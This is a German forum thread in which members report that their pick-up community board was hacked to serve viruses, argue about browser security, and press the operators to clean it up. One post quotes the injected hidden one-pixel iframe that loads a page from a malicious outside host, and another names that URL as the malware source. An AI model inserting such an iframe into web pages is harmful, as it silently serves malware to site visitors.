Viren im Pick Up Forum

60 Beiträge in diesem Thema

Empfohlene Beiträge

Ich hab zwar gedacht, ich hätte klar gemacht, was ich sagen will, aber ich erklärs dann eben noch mal:

Ich nutze den IE aus Faulheit und dass der Fehler hat ist mir bekannt, deshalb hab ich ja auch zusätzlichen Schutz, z.B. Antivir. Dass dieser Schutz ausreichend ist zeigt sich schon dadurch, dass die Viren vom Forum meinen PC nicht infiziert haben, genauso, wie alle anderen.

Soso... du denkst es ist ausreichend? Nunja... weisste wie son virenscanner funzt? Er hat signaturen von schädlingen. Nun stell dir mal vor, da gibts nen schädling, aber keine signatur... was nun? Der scanner erkennt den nicht. Und nun geh ich noch nen schritt weiter... es gibt lücken, die noch niemand, ausser dem angreifer, kennt. Was heisst das? Das heisst, weder deine Firewall, noch dein antiviren programm noch du, können bemerken, dass da ein fehler ist. Schon ist ein schädling drauf.

Und nun gehts weiter... jaaa ich gehe noch weiter...

Nun stell dir vor, dass du deinem betriebssystem nicht mehr vertrauen kannst! Stell dir vor der schädling manipuliert direkt dein Betriebssystem auf der untersten Ebene. Der ebene, die mit der hardware kommuniziert. Die ebene, die dein antiviren scanner benutzt um etwas zu tun. die eben, die deine firewall benutzt um deine verbindungen zu kontrollieren.

Da du IE benutzt und wahscheinlich als Admin unterwegs bist, ist all dies real und wird von hackern genutzt.

Du kannst deinem system nicht trauen. fertig...

Wenn dir alle raten IE nicht zu benutzen, dann tu es doch einfahc nicht. Das risiko IST einfach höher!

Es liegt nicht daran, dass im IE so viele lücken sind! Mitlerweile wurde ein sehr grosser teil gefunden! Jedes gefundene loch, ist ein bereinigstes loch. Im firefox, opera und vorallem Safari (ohoh mac user, der browser is bullshit und voller löcher, glaubt mir) gibt es auch 1000 von lücken. Aber die sind nciht so verbreitet und werden deshalb nicht so oft ausgenutzt.

Diesen Beitrag teilen

Link zum Beitrag
träum weiter kind, firewalls etc nützen einen dreck gegen richtige viren.

Gibt´s nen Grund dafür, dass du glaubst, du hättest das Recht mich von oben herab zu behandeln?

Psychologen würden sagen: wenig Selbstachtung, aber da ich keiner bin...

Ich bin mittlerweile beim Firefox, seh´s aber weiterhin nicht ein, weil mir bisher noch keine ´richtigen Viren´ begegnet sind sondern nur die Kinderviren, die mein Antivir entdeckt hat und die kommen vom Forum.

Das wars für mich mit dem Thema Browser.

Sollte jemand Tips für mich haben, wie ich erwachsen werde, dann wär ich SEHR DANKBAR, wenn er sie an meine email ´[email protected]´ schicken würde.

Jekyll.

Diesen Beitrag teilen

Link zum Beitrag
Gast
Also, entweder gefällt den Jungs von http://www.effective-seduction.de/ ihr neues Design (ein alpha alien?) oder sie haben es noch nicht gemerkt ...
ist schon länger gefixed.

spannender wäre zu wissen, warum die Site gehackt wurde. Angriff auf BR persönlich? Angriff auf ES? Wenn ja, warum? Und wer macht überhaupt so einen Scheiß?

Diesen Beitrag teilen

Link zum Beitrag

Kannst ja fragen! Der Typ hieß 4Lex oder so stand im Header von der Page sogar mit ICQ nummer und email. Er antwortet mir nicht. Alles andere hätte mich auch gewundert, aber schon lustig das ganze

:D

Erinnert mich an meine Zeit vor nem halben Jahr als ich noch ein Computerfreak war...

Diesen Beitrag teilen

Link zum Beitrag

Also, entweder gefällt den Jungs von http://www.effective-seduction.de/ ihr neues Design (ein alpha alien?) oder sie haben es noch nicht gemerkt ...

ist schon länger gefixed.

spannender wäre zu wissen, warum die Site gehackt wurde. Angriff auf BR persönlich? Angriff auf ES? Wenn ja, warum? Und wer macht überhaupt so einen Scheiß?

Sorry, es war nur noch in meinem Cache - das alpha alien ...

Diesen Beitrag teilen

Link zum Beitrag

So, hab mir jetz nicht alle 3 Seiten durchgelesen, aber wäre es dann nicht ne gute Idee wenn Brother Rabbit mal ne Mail an alle Forenmitglieder raushaut? ich wette es gibt immernoch welche die mit IE versuchen ins vorum zu kommen und scheitern...am besten gleich mit downloadlink für Firefox oder Opera.

MfG The Voice

Diesen Beitrag teilen

Link zum Beitrag
Gast santacruzz

Tja, heute wieder das gleiche Schauspiel mit den Viren (die letzten paar Tage funktionierte es ja problemlos auch mit dem IE!)

Diesen Beitrag teilen

Link zum Beitrag
Tja, heute wieder das gleiche Schauspiel mit den Viren (die letzten paar Tage funktionierte es ja problemlos auch mit dem IE!)

Bin ich eigentlich der einzige der der Meinung ist, daß sich der genannte buffer overflow exploit in dem kleinen Quadrat bild in der mitte des oberen Rands des Forum versteckt? Das war vor dem hack noch nicht da. Sollte man vielleicht mal entfernen, dann klappts auch wieder mit dem IE.

Diesen Beitrag teilen

Link zum Beitrag

Ich bin seit gestern auch auf den Firefox umgestiegen, aber Antivir bombadiert mich trotzdem weiterhin ständig mit neuen Trojanerwarnungen. Ich hab etliche male Antivir + Adaware laufen lassen und alles entfernt, die Trojaner kommen trotzdem immer wieder. Hat irgendwer Lösungsvorschläge?

Diesen Beitrag teilen

Link zum Beitrag

Bin ich eigentlich der einzige der der Meinung ist, daß sich der genannte buffer overflow exploit in dem kleinen Quadrat bild in der mitte des oberen Rands des Forum versteckt? Das war vor dem hack noch nicht da. Sollte man vielleicht mal entfernen, dann klappts auch wieder mit dem IE.

nö, bist nicht der einzige!!! Dieses Board ist DEFINITIV gehackt worden. (außer, und das nehme ich nicht an, man will hier vorsätzlich viren einschleusen).

die quelle ist: http://zabywjwzlr.biz/dl/adv416.php

Ist eigentlich ein wahnsinn, dass hier schon seit 3 wochen nichts passiert ist!!!!!!!!! :blink:

über diesen hack werden diverse viren und werbeprogramme eingeschleust.

und es geht hier nicht um eine diskussion von firefox/internet explorer oder weiss der teufel noch was.

sondern darum, dass man anscheinend nichts gegen den hack macht!

an alle firefox befürworter: auch dieser hat sicherheitslücken (wie eigentlich jedes programm auf dieser welt)

:wub:

nö, bist nicht der einzige!!! Dieses Board ist DEFINITIV gehackt worden. (außer, und das nehme ich nicht an, man will hier vorsätzlich viren einschleusen).

Ist eigentlich ein wahnsinn, dass hier schon seit 3 wochen nichts passiert ist!!!!!!!!! :wub:

:blink:

Ist eigentlich ein wahnsinn, dass hier schon seit 3 wochen nichts passiert ist!!!!!!!!! :blink:

:wub:

Diesen Beitrag teilen

Link zum Beitrag

Hauptproblem ist doch das Invision Power Board.

Ganz unten steht, dass es Version 2.1.3 ist.

Die aktuelle Version ist 2.1.7.

Was dort alles an Exploits inzwischen besteht, auf so was wird man sich öfters einstellen müssen.

Diesen Beitrag teilen

Link zum Beitrag

automatische weiterleitung unterdrücken, dann sollte nichts mehr passieren

ansonsten hilft wohl nurn update des forums damit das wieder in ordnung kommt

Diesen Beitrag teilen

Link zum Beitrag

es hat sich n fremdes <iframe> mit nem mistlink eingeschlichen, hätte ich ftp zugriff wäre es schon längst verschwunden....

Diesen Beitrag teilen

Link zum Beitrag
Gast NaturalGame

auf macht mal was dagegen, kann ja nicht angehn das wenn ich nem kumpel den link zum forum gebe er denkt ich will ihn verarschen wegen virenwarnung etc.

Diesen Beitrag teilen

Link zum Beitrag

Okay, ich frag mal anders:

WER kann etwas dagegen machen?

Diesen Beitrag teilen

Link zum Beitrag

die Forenbetreiber !!!!!!

Diesen Beitrag teilen

Link zum Beitrag

die Forenbetreiber !!!!!!

irgend jemand der ftp zugang hätte würde schon genügen ;)

Diesen Beitrag teilen

Link zum Beitrag

vielleicht hat der Hacker selbst ja irgendwann Mitleid, wenn das Teil hier nach einem halben Jahr immer noch drin ist und machts selbst wieder raus :lol:

mal im Ernst: es ist ein ARMUTSZEUGNIS, dass der Hack hier in mehr als 2 Monaten noch nicht entfernt worden ist!

Diesen Beitrag teilen

Link zum Beitrag

Der Code soll wohl jetzt entfernt worden sein, falls immernoch einzelne Warnungen kommen, dann bescheid geben!

Diesen Beitrag teilen

Link zum Beitrag

der böse iframe in der index.php ist immernoch vorhanden

<iframe src="http://zabywjwzlr.biz/dl/adv416.php" width=1 height=1></iframe>

Diesen Beitrag teilen

Link zum Beitrag

ich verstehe nicht warum das niemand rept :wub: ist doch in ein paar minuten erledigt ... oder is der phöse virus etwa absicht :wub: ?

Diesen Beitrag teilen

Link zum Beitrag

Der wurde entfernt, aber der Hack scheint den Code immer wieder neu einzufügen.

Und laut meiner Info aus dem Mod-Forum weigert sich der Host Updates dagegen auszuführen

Diesen Beitrag teilen

Link zum Beitrag

Erstelle ein Mitgliedskonto, oder melde Dich an, um zu kommentieren

Du musst ein Mitgliedskonto haben, um einen Kommentar verfassen zu können

Mitgliedskonto erstellen

Registriere Dich ganz einfach in unserer Community.

Mitgliedskonto registrieren

Anmelden

Du hast bereits ein Mitgliedskonto? Melde Dich hier an.

Jetzt anmelden